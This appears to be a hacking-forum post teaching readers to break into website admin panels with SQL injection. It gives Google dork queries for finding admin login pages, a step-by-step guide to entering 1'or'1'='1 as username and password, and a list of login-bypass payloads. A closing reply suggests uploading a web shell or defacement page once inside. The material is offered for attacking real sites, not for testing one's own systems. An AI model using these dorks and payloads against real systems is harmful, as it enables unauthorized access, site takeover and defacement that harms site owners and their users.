Hacking Admin Account

We're gonna hack into an admin account, using SQL injections.

How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.

Dorks:

Code:

inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

Step 1: Go to [You must be registered and logged in to see this link.] type in ''admin/login.asp site:net'' and search (You can also use the option, to search only in your country).
[You must be registered and logged in to see this image.]

Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''website.com/admin/login.asp''.


Step 3: Go to the website admin login page, type in:

Code:

username: 1'or'1'='1
password: 1'or'1'='1

[You must be registered and logged in to see this image.]

DONE!  WE ARE NOW LOGGED AS ADMINISTRATOR !

[You must be registered and logged in to see this image.]

Other Injection Queries:

Code:

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a

After That can i upload Shell??

Darkgoogly wrote:

After That can i upload Shell??

It depends. If that site has upload button you can upload your shell or deface page